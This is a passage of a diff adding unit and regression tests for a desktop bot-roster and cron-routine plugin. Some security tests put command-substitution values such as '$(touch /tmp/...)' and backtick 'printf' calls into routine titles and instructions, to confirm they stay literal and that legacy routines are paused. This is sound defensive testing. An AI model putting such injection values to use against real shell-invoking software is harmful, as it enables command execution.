+test('regression: rendering BotsPane does not prewarm the entire roster', () => {
+  const botsPaneSource = sourceBetween('function BotsPane(', '// ── plugin')
+
+  assert.doesNotMatch(botsPaneSource, /host\.warmProfile/)
+})
+
+test('behavior: pointer entry prewarms only the hovered bot', () => {
+  const { row, warmed } = renderBotRow('alpha')
+
+  assert.deepEqual(warmed, [])
+  assert.equal(typeof row.props.onPointerEnter, 'function')
+  row.props.onPointerEnter()
+  assert.deepEqual(warmed, ['alpha'])
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/roster-groups.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/roster-groups.test.mjs
@@ -1,0 +1,97 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request: () => Promise.resolve({}),
+      state: { profile: { get: () => 'default', listen: () => undefined }, gateway: { listen: () => undefined } }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__groups = { groupRoster, knownGroups };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return context.__groups
+}
+
+const ROSTER = [{ name: 'hermes' }, { name: 'researcher' }, { name: 'builder' }, { name: 'pm' }]
+
+test('groupRoster: ungrouped bots lead, groups follow alphabetically, roster order kept inside', () => {
+  const { groupRoster } = load()
+  const meta = {
+    researcher: { group: 'Research' },
+    pm: { group: 'Ops' },
+    builder: { group: 'Research' }
+  }
+
+  const sections = groupRoster(ROSTER, meta)
+
+  // JSON round-trip: vm-realm arrays fail deepEqual on prototype identity.
+  assert.equal(
+    JSON.stringify(sections.map(s => [s.group, s.bots.map(b => b.name)])),
+    JSON.stringify([
+      [null, ['hermes']],
+      ['Ops', ['pm']],
+      ['Research', ['researcher', 'builder']]
+    ])
+  )
+})
+
+test('groupRoster: no groups means one plain section — zero separators', () => {
+  const { groupRoster } = load()
+
+  const sections = groupRoster(ROSTER, {})
+
+  assert.equal(sections.length, 1)
+  assert.equal(sections[0].group, null)
+  assert.equal(sections[0].bots.length, 4)
+})
+
+test('groupRoster: blank/whitespace group values count as ungrouped', () => {
+  const { groupRoster } = load()
+
+  const sections = groupRoster(ROSTER, { pm: { group: '  ' }, builder: { group: '' }, hermes: { group: null } })
+
+  assert.equal(sections.length, 1)
+  assert.equal(sections[0].group, null)
+})
+
+test('knownGroups: unique, trimmed, alphabetical', () => {
+  const { knownGroups } = load()
+
+  const groups = knownGroups({
+    a: { group: 'research' },
+    b: { group: 'Ops' },
+    c: { group: 'research' },
+    d: { group: '' },
+    e: {}
+  })
+
+  assert.equal(JSON.stringify(groups), JSON.stringify(['Ops', 'research']))
+})
+
+test('source contract: the roster render is sectioned and the row menu offers grouping', () => {
+  assert.match(pluginSource, /groupRoster\(filteredRoster, allMeta\)\.flatMap/)
+  assert.match(pluginSource, /onGroup: setGrouping/)
+  assert.match(pluginSource, /'Move to group…'/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/roster-preview.test.mjs
@@ -1,0 +1,191 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function runtime() {
+  const atom = value => ({ get: () => value, set: () => undefined })
+  const jsx = (type, props = {}) => ({ type, props })
+  const context = {
+    atom,
+    jsx,
+    jsxs: jsx,
+    useQuery: () => ({}),
+    useValue: value => (value?.get ? value.get() : value),
+    useState: value => [value, () => undefined],
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: { state: { profile: { get: () => 'ops', listen: () => undefined } }, request: () => undefined }
+  }
+  const code = source
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(
+      '\nglobalThis.__previewKind = previewKind;\nglobalThis.__generatedSessionTitle = generatedSessionTitle;\nglobalThis.__isGenericTitle = isGenericTitle;'
+    )
+  vm.runInNewContext(code, context)
+  return context
+}
+
+// NOTE: objects created inside the vm realm carry that realm's Object
+// prototype, so assert.deepEqual against host-realm literals fails on
+// reference-equality. Compare fields explicitly.
+function fromBotOf(preview) {
+  return runtime().__previewKind(preview).fromBot
+}
+
+test('previewKind: a plain chat preview is a human exchange, not a DM', () => {
+  assert.equal(fromBotOf('Can you check the vault sync?'), null)
+})
+
+test('previewKind: parses the current 🤖 delivery prefix and sender handle', () => {
+  assert.equal(fromBotOf('Message from 🤖 manager (@manager): Learn-share: skill installed'), 'manager')
+})
+
+test('previewKind: parses the legacy agent-prefix shape', () => {
+  assert.equal(fromBotOf("Message from agent 'researcher': here is the paper"), 'researcher')
+})
+
+test('previewKind: empty or absent preview is not a DM', () => {
+  assert.equal(fromBotOf(''), null)
+  assert.equal(fromBotOf(undefined), null)
+})
+
+test('isGenericTitle: auto-assigned titles are generic', () => {
+  const r = runtime()
+  assert.equal(r.__isGenericTitle('Bot Chat'), true)
+  assert.equal(r.__isGenericTitle('New chat'), true)
+  assert.equal(r.__isGenericTitle(''), true)
+  assert.equal(r.__isGenericTitle('Weekly review planning'), false)
+})
+
+test('generatedSessionTitle: keeps a meaningful stored title', () => {
+  const r = runtime()
+  assert.equal(r.__generatedSessionTitle({ title: 'Weekly review' }, 'some preview'), 'Weekly review')
+})
+
+test('generatedSessionTitle: invents a label from the preview for generic titles', () => {
+  const r = runtime()
+  assert.equal(r.__generatedSessionTitle({ title: 'Bot Chat' }, 'The tailnet proxy binds 100.64.0.1'), 'The tailnet proxy binds 100.64.0.1')
+})
+
+test('generatedSessionTitle: strips the bot-to-bot prefix before generating', () => {
+  const r = runtime()
+  const out = r.__generatedSessionTitle({ title: '' }, 'Message from 🤖 manager (@manager): Learn-share: skill installed')
+  assert.match(out, /Learn-share/)
+  assert.doesNotMatch(out, /Message from/)
+})
+
+test('generatedSessionTitle: caps the generated label length', () => {
+  const r = runtime()
+  const out = r.__generatedSessionTitle({ title: '' }, 'this is a very long preview that goes on and on and on about something or other entirely')
+  assert.ok(out.length <= 34, `expected <= 34 chars, got ${out.length}: ${out}`)
+})
+
+// ── render smoke: BotRow must paint the new row furniture without throwing ──
+
+function renderRuntime() {
+  const atom = value => ({ get: () => value, set: () => undefined })
+  const jsx = (type, props = {}) => ({ type, props })
+  const context = {
+    atom,
+    jsx,
+    jsxs: jsx,
+    cn: (...args) => args.filter(Boolean).join(' '),
+    Button: 'Button',
+    BotFace: 'BotFace',
+    Codicon: 'Codicon',
+    ContextMenu: 'ContextMenu',
+    ContextMenuContent: 'ContextMenuContent',
+    ContextMenuItem: 'ContextMenuItem',
+    ContextMenuSeparator: 'ContextMenuSeparator',
+    ContextMenuTrigger: 'ContextMenuTrigger',
+    haptic: () => undefined,
+    host: {
+      state: {
+        profile: { get: () => 'scribe', listen: () => undefined },
+        gateway: { get: () => 'idle', listen: () => undefined }
+      },
+      request: () => Promise.resolve({ sessions: [] }),
+      openSession: () => undefined,
+      newChat: () => undefined,
+      navigate: () => undefined
+    },
+    profileColor: () => '#8b5cf6',
+    queryClient: { invalidateQueries: () => undefined },
+    relativeTime: () => 'now',
+    useQuery: () => ({}),
+    useValue: value => (value?.get ? value.get() : value),
+    useState: value => [value, () => undefined],
+    useEffect: () => undefined,
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }
+  }
+  const code = source
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__BotRow = BotRow;')
+  vm.runInNewContext(code, context)
+  return context
+}
+
+function textOf(node) {
+  if (node == null || typeof node === 'boolean') return ''
+  if (typeof node === 'string' || typeof node === 'number') return String(node)
+  if (Array.isArray(node)) return node.map(textOf).join(' ')
+  if (typeof node === 'object') {
+    if (node.props) return textOf(node.props.children ?? '')
+    return Object.values(node).map(textOf).join(' ')
+  }
+  return ''
+}
+
+const DM_BOT = {
+  name: 'scribe',
+  title: 'Scribe',
+  description: '',
+  last_session: {
+    id: 's1',
+    title: 'Bot Chat',
+    preview: 'Message from 🤖 manager (@manager): Learn-share: skill installed in your profile',
+    last_active: Math.floor(Date.now() / 1000) - 5
+  }
+}
+
+test('render: BotRow shows the sender badge and stripped DM preview', () => {
+  const r = renderRuntime()
+  const tree = r.__BotRow({ bot: DM_BOT, onEdit: () => undefined })
+  const text = textOf(tree)
+  assert.match(text, /@manager/)
+  assert.match(text, /Learn-share/)
+  assert.doesNotMatch(text, /Message from/)
+})
+
+test('render: BotRow renders plain previews without a badge', () => {
+  const r = renderRuntime()
+  const tree = r.__BotRow({
+    bot: { name: 'ops', title: 'Ops', description: '', last_session: { id: 's2', title: 'Weekly review', preview: 'All hosts are healthy', last_active: 1_700_000_000 } },
+    onEdit: () => undefined
+  })
+  const text = textOf(tree)
+  assert.match(text, /All hosts are healthy/)
+  assert.doesNotMatch(text, /@manager/)
+  // The inline session-history chip is gone — stored history lives in the
+  // Sessions workspace (context menu), so the title no longer renders inline.
+  assert.doesNotMatch(text, /Weekly review/)
+})
+
+test('render: BotRow tolerates a fresh bot with no sessions yet', () => {
+  const r = renderRuntime()
+  const tree = r.__BotRow({ bot: { name: 'newbie', title: '', description: 'Fresh bot' }, onEdit: () => undefined })
+  const text = textOf(tree)
+  assert.match(text, /Fresh bot/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/routine-owner.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/routine-owner.test.mjs
@@ -1,0 +1,86 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+const plain = value => JSON.parse(JSON.stringify(value))
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = {
+      get: () => values.get(slot),
+      set: value => values.set(slot, typeof value === 'function' ? value(values.get(slot)) : value)
+    }
+    values.set(slot, initial)
+    return slot
+  }
+  const invalidations = []
+  const context = {
+    atom,
+    host: {
+      state: {
+        profile: { get: () => 'ops', listen: () => undefined },
+        gateway: { get: () => 'open', listen: () => undefined }
+      },
+      request: async () => ({ jobs: [] }),
+      notify: () => undefined,
+      notifyError: () => undefined
+    },
+    queryClient: {
+      invalidateQueries: async options => invalidations.push(options)
+    },
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__routineOwners = { routineCreateTarget, invalidateRoutineOwner };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return { ...context, invalidations }
+}
+
+test('routine creation keeps its captured owner while another bot becomes active', () => {
+  const runtime = load()
+  assert.equal(runtime.__routineOwners.routineCreateTarget('ops', 'ops'), 'ops')
+  assert.equal(runtime.__routineOwners.routineCreateTarget('ops', 'default'), 'ops')
+  assert.equal(runtime.__routineOwners.routineCreateTarget(null, 'default'), 'default')
+})
+
+test('routine mutation invalidates only its immutable owner cache', async () => {
+  const runtime = load()
+  await runtime.__routineOwners.invalidateRoutineOwner('ops')
+  assert.deepEqual(plain(runtime.invalidations), [{
+    queryKey: ['hermes-bots', 'routines', 'ops'],
+    exact: true
+  }])
+})
+
+test('source contract: row mutations invalidate the profile that owned the request', () => {
+  assert.match(
+    pluginSource,
+    /function RoutineRow\(\{ job, profile \}\)[\s\S]*await host\.request\('cron\.manage', \{ action, name: job\.job_id, \.\.\.\(profile \? \{ profile \} : \{\}\) \}\)[\s\S]*await invalidateRoutineOwner\(profile\)/
+  )
+  assert.doesNotMatch(pluginSource, /function RoutineRow\(\{ job, onChanged, profile \}\)/)
+})
+
+test('source contract: create mutations and dialog state retain one owner', () => {
+  assert.match(
+    pluginSource,
+    /function CreateRoutineDialog\(\{ bot, open, onClose \}\)[\s\S]*await host\.request\('cron\.manage', \{[\s\S]*\.\.\.\(bot \? \{ profile: bot \} : \{\}\)[\s\S]*await invalidateRoutineOwner\(bot\)/
+  )
+  assert.match(pluginSource, /const \[createOwner, setCreateOwner\] = useState\(null\)/)
+  assert.match(pluginSource, /const openCreate = \(\) => \{[\s\S]*setCreateOwner\(bot\)[\s\S]*setCreateOpen\(true\)/)
+  assert.match(pluginSource, /const createTarget = routineCreateTarget\(createOwner, bot\)/)
+  assert.match(pluginSource, /key: createTarget/)
+  assert.match(pluginSource, /bot: createTarget/)
+  assert.doesNotMatch(pluginSource, /setCreateOwner\(owner =>/)
+  assert.doesNotMatch(pluginSource, /onChanged: \(\) => void refetch\(\)/)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/routine-prompt.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/routine-prompt.test.mjs
@@ -1,0 +1,190 @@
+import assert from 'node:assert/strict'
+import { spawnSync } from 'node:child_process'
+import { existsSync, readFileSync, rmSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load(request = async () => ({ jobs: [] })) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom, PALETTE_AREA: 'palette', COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: {
+      request,
+      state: {
+        profile: { listen: () => undefined },
+        gateway: { listen: () => undefined }
+      }
+    }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat(
+      '\nglobalThis.__routines = { isLegacyDelegatedRoutine, loadRoutines, normalizedProfileName, routineInputError, routinePrompt };\n'
+    )
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return context
+}
+
+test('unit: direct execution is selected for the active bot profile', () => {
+  const { __routines } = load()
+  assert.equal(__routines.normalizedProfileName(' Default '), 'default')
+  assert.equal(__routines.routinePrompt('default', 'Health', 'Collect status', ' DEFAULT '), 'Collect status')
+})
+
+test('integration: a different active profile retains the delegated routine wrapper', () => {
+  const { __routines } = load()
+  const prompt = __routines.routinePrompt('research', 'Digest', 'Summarize findings', 'default')
+  assert.match(prompt, /hermes -p 'research' chat/)
+  assert.match(prompt, /\[Scheduled routine\] Summarize findings/)
+})
+
+test('security: delegated routine arguments remain literal shell values', () => {
+  const { __routines } = load()
+  const title = 'Audit $(printf TITLE_EXPANDED) `printf TITLE_TICK` \'quoted\''
+  const instruction = 'Line one $(printf TASK_EXPANDED) `printf TASK_TICK`\nLine two \'quoted\''
+  const prompt = __routines.routinePrompt('research', title, instruction, 'default')
+  const command = prompt.slice(prompt.indexOf('hermes '), prompt.lastIndexOf('\n\nIf the command'))
+  const script = `hermes() { printf '%s\\037' "$@"; }\n${command}`
+  const result = spawnSync('sh', ['-c', script], { encoding: 'utf8' })
+
+  assert.equal(result.status, 0, result.stderr)
+  assert.deepEqual(result.stdout.split('\x1f').slice(0, -1), [
+    '-p',
+    'research',
+    'chat',
+    '-c',
+    `Routine: ${title}`,
+    '-q',
+    `[Scheduled routine] ${instruction}`
+  ])
+})
+
+test('security: upgrade pauses persisted delegated routines before they can execute', async () => {
+  const titleSentinel = `/tmp/hermes-bot-mode-title-${process.pid}`
+  const taskSentinel = `/tmp/hermes-bot-mode-task-${process.pid}`
+  rmSync(titleSentinel, { force: true })
+  rmSync(taskSentinel, { force: true })
+
+  const title = `Audit $(touch ${titleSentinel})`
+  const instruction = `Inspect $(touch ${taskSentinel})`
+  const oldPrompt =
+    `You are running the scheduled routine "${title}" for agent 'research'. ` +
+    `Execute it AS that agent so the run lands in its own history: run this in the terminal and relay the output:\n\n` +
+    `hermes -p research chat -c "Routine: ${title}" -q ${JSON.stringify(`[Scheduled routine] ${instruction}`)}\n\n` +
+    `If the command fails, report the error instead.`
+  const persisted = JSON.parse(
+    JSON.stringify({
+      job_id: 'legacy-job',
+      name: '[bot:research] Audit',
+      prompt: oldPrompt,
+      prompt_preview: oldPrompt.slice(0, 100),
+      schedule: 'every 2h',
+      enabled: true,
+      state: 'scheduled',
+      repeat: { times: 3, completed: 1 }
+    })
+  )
+  const requests = []
+  const runtime = load(async (method, params) => {
+    requests.push([method, params])
+
+    if (params.action === 'list') {
+      return { jobs: [persisted] }
+    }
+
+    if (params.action === 'pause' && params.name === persisted.job_id) {
+      persisted.enabled = false
+      persisted.state = 'paused'
+      return { success: true }
+    }
+
+    throw new Error(`Unexpected request: ${method} ${JSON.stringify(params)}`)
+  })
+
+  const result = await runtime.__routines.loadRoutines()
+  assert.deepEqual(JSON.parse(JSON.stringify(requests)), [
+    ['cron.manage', { action: 'list', include_disabled: true }],
+    ['cron.manage', { action: 'pause', name: 'legacy-job' }]
+  ])
+  assert.equal(result.jobs[0].job_id, 'legacy-job')
+  assert.equal(result.jobs[0].schedule, 'every 2h')
+  assert.deepEqual(result.jobs[0].repeat, { times: 3, completed: 1 })
+  assert.equal(result.jobs[0].enabled, false)
+  assert.equal(result.jobs[0].state, 'paused')
+  assert.equal(existsSync(titleSentinel), false)
+  assert.equal(existsSync(taskSentinel), false)
+
+  await runtime.__routines.loadRoutines()
+  assert.deepEqual(JSON.parse(JSON.stringify(requests.slice(2))), [
+    ['cron.manage', { action: 'list', include_disabled: true }]
+  ])
+  assert.match(pluginSource, /disabled: busy \|\| legacyUnsafe/)
+  assert.match(pluginSource, /Paused for security: delete and recreate this legacy cronjob/)
+
+  const recreated = runtime.__routines.routinePrompt('research', title, instruction, 'default')
+  assert.equal(runtime.__routines.isLegacyDelegatedRoutine({ ...persisted, prompt_preview: recreated.slice(0, 100) }), false)
+  const command = recreated.slice(recreated.indexOf('hermes '), recreated.lastIndexOf('\n\nIf the command'))
+  const script = `hermes() { printf '%s\\037' "$@"; }\n${command}`
+  const executed = spawnSync('sh', ['-c', script], { encoding: 'utf8' })
+  assert.equal(executed.status, 0, executed.stderr)
+  assert.deepEqual(executed.stdout.split('\x1f').slice(0, -1), [
+    '-p',
+    'research',
+    'chat',
+    '-c',
+    `Routine: ${title}`,
+    '-q',
+    `[Scheduled routine] ${instruction}`
+  ])
+  assert.equal(existsSync(titleSentinel), false)
+  assert.equal(existsSync(taskSentinel), false)
+})
+
+test('robustness: routine input rejects NUL before cron creation', () => {
+  const { __routines } = load()
+  assert.equal(__routines.routineInputError('Normal title', 'Normal instruction'), null)
+  assert.match(__routines.routineInputError('Bad\0title', 'Normal instruction'), /NUL.*U\+0000/)
+  assert.match(__routines.routineInputError('Normal title', 'Bad\0instruction'), /NUL.*U\+0000/)
+  assert.match(
+    pluginSource,
+    /const inputError = routineInputError\(title, task\)[\s\S]*if \(inputError\)[\s\S]*setError\(inputError\)[\s\S]*return[\s\S]*host\.request\('cron\.manage'/
+  )
+})
+
+test('regression: Create Cronjob passes the active profile to routinePrompt', () => {
+  assert.match(pluginSource, /prompt: routinePrompt\(bot, title, task, activeProfile\)/)
+  const { __routines } = load()
+  const instruction = 'Keep "quoted" output intact'
+  assert.equal(__routines.routinePrompt('ops', 'Check', instruction, 'ops'), instruction)
+  assert.doesNotMatch(__routines.routinePrompt('ops', 'Check', instruction, 'ops'), /hermes -p/)
+})
+
+test('system: the direct-file plugin still registers its panes', () => {
+  const runtime = load()
+  const registered = []
+  runtime.plugin.register({ storage: { get: () => null }, register: entry => registered.push(entry) })
+  assert.equal(registered.some(entry => entry.id === 'pane'), true)
+  assert.equal(registered.some(entry => entry.id === 'routines'), true)
+})
+
+test('performance: direct prompt selection remains bounded', t => {
+  const { __routines } = load()
+  const start = Date.now()
+  for (let index = 0; index < 10000; index += 1) __routines.routinePrompt('ops', 'Check', 'Inspect', 'ops')
+  const elapsed = Date.now() - start
+  t.diagnostic(`10,000 direct prompt selections: ${elapsed} ms`)
+  assert.ok(elapsed < 1000)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/routines-error.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/routines-error.test.mjs
@@ -1,0 +1,63 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load() {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: { state: { profile: { listen: () => undefined } } }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__api = { selectRoutineJobs };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return context
+}
+
+const jobs = [
+  { name: '[bot:ops] Morning', job_id: '1' },
+  { name: '[bot:research] Digest', job_id: '2' }
+]
+
+test('unit: a live list is filtered to the current bot', () => {
+  const { jobs: shown, live } = load().__api.selectRoutineJobs({ jobs }, null, [], 'ops')
+  assert.equal(live.length, 2)
+  assert.equal(shown.length, 1)
+  assert.equal(shown[0].job_id, '1')
+})
+
+test('unit: a failed refresh keeps the last good list', () => {
+  const view = load().__api.selectRoutineJobs(undefined, new Error('down'), jobs, 'ops')
+  assert.equal(view.live, null)
+  assert.equal(view.all.length, 2)
+  assert.equal(view.jobs.length, 1)
+})
+
+test('regression: a true empty list is still empty', () => {
+  const view = load().__api.selectRoutineJobs({ jobs: [] }, null, jobs, 'ops')
+  assert.ok(view.live)
+  assert.equal(view.jobs.length, 0)
+})
+
+test('regression: a first load error has no jobs to show', () => {
+  const view = load().__api.selectRoutineJobs(undefined, new Error('down'), [], 'ops')
+  assert.equal(view.all.length, 0)
+  assert.equal(view.jobs.length, 0)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/routines-pause-failure.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/routines-pause-failure.test.mjs
@@ -1,0 +1,99 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+import vm from 'node:vm'
+
+// loadRoutines pauses persisted delegated routines inline before returning the
+// list. A single pause RPC failing used to reject the whole query — the pane
+// showed "Could not load cronjobs" (or the stale notice) over a list that
+// loaded fine, and the 20s poll retried the failing pause inside a failing
+// query forever. Each pause now swallows its own error, and the paused-state
+// overlay only claims jobs the gateway actually paused.
+
+const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
+function load(request) {
+  const values = new Map()
+  const atom = initial => {
+    const slot = { get: () => values.get(slot), set: value => values.set(slot, value) }
+    values.set(slot, initial)
+    return slot
+  }
+  const context = {
+    atom,
+    PALETTE_AREA: 'palette',
+    COMPOSER_AREAS: { middleware: 'middleware' },
+    document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } },
+    host: { request, state: { profile: { listen: () => undefined } } }
+  }
+  const source = pluginSource
+    .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '')
+    .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '')
+    .replace(/^import .* from 'react'\r?\n/m, '')
+    .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '')
+    .replace('export default {', 'globalThis.plugin = {')
+    .concat('\nglobalThis.__routines = { loadRoutines };\n')
+  vm.runInNewContext(source, context, { filename: 'plugin.js' })
+  return context
+}
+
+const LEGACY_PREFIX = 'You are running the scheduled routine "'
+
+test('regression: a failed legacy-routine pause does not fail the routines list', async () => {
+  const jobs = [
+    { job_id: 'legacy-fails', name: '[bot:research] Audit', prompt_preview: `${LEGACY_PREFIX}Audit" for agent 'research'`, enabled: true, state: 'scheduled' },
+    { job_id: 'legacy-pauses', name: '[bot:research] Build', prompt_preview: `${LEGACY_PREFIX}Build" for agent 'research'`, enabled: true, state: 'scheduled' },
+    { job_id: 'normal', name: '[bot:research] Report', prompt: 'Summarize the day', enabled: true, state: 'scheduled' }
+  ]
+  const requests = []
+  const runtime = load(async (method, params) => {
+    requests.push([method, params])
+
+    if (params.action === 'list') {
+      return { jobs }
+    }
+    if (params.action === 'pause' && params.name === 'legacy-fails') {
+      throw new Error('gateway rejected the pause')
+    }
+    if (params.action === 'pause') {
+      return { success: true }
+    }
+    throw new Error(`Unexpected request: ${method} ${JSON.stringify(params)}`)
+  })
+
+  // Pre-fix this rejected with the pause error.
+  const result = await runtime.__routines.loadRoutines('research')
+  assert.equal(result.jobs.length, 3)
+
+  const byId = Object.fromEntries(result.jobs.map(job => [job.job_id, job]))
+  // Only the pause the gateway confirmed is overlaid as paused; the failed
+  // one keeps its server state and is retried on the next poll.
+  assert.equal(byId['legacy-fails'].enabled, true)
+  assert.equal(byId['legacy-fails'].state, 'scheduled')
+  assert.equal(byId['legacy-pauses'].enabled, false)
+  assert.equal(byId['legacy-pauses'].state, 'paused')
+  assert.equal(byId.normal.enabled, true)
+
+  assert.deepEqual(
+    requests.map(([method, params]) => [method, params.action, params.name]),
+    [
+      ['cron.manage', 'list', undefined],
+      ['cron.manage', 'pause', 'legacy-fails'],
+      ['cron.manage', 'pause', 'legacy-pauses']
+    ]
+  )
+})
+
+test('regression: all-pauses-failing still resolves with the list', async () => {
+  const runtime = load(async (method, params) => {
+    if (params.action === 'list') {
+      return { jobs: [{ job_id: 'only', name: '[bot:ops] Watch', prompt_preview: `${LEGACY_PREFIX}Watch" for agent 'ops'`, enabled: true, state: 'scheduled' }] }
+    }
+    throw new Error('gateway down')
+  })
+
+  const result = await runtime.__routines.loadRoutines('ops')
+  assert.equal(result.jobs[0].job_id, 'only')
+  assert.equal(result.jobs[0].enabled, true)
+})

--- a/apps/desktop/src/plugins/hermes-bots/tests/routines-profile-scope.test.mjs
+++ b/apps/desktop/src/plugins/hermes-bots/tests/routines-profile-scope.test.mjs
@@ -1,0 +1,31 @@
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import test from 'node:test'
+
+// #37: the Routines pane must scope cron.manage to the bot's OWN cron store via
+// the core RPC's optional `profile` param (a bot's profile can run a separate
+// gateway / keep cron in ~/.hermes/profiles/<name>/cron/). Older gateways
+// ignore the unknown param, so the [bot:] tag filter stays the fallback.
+
+const source = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8')
+
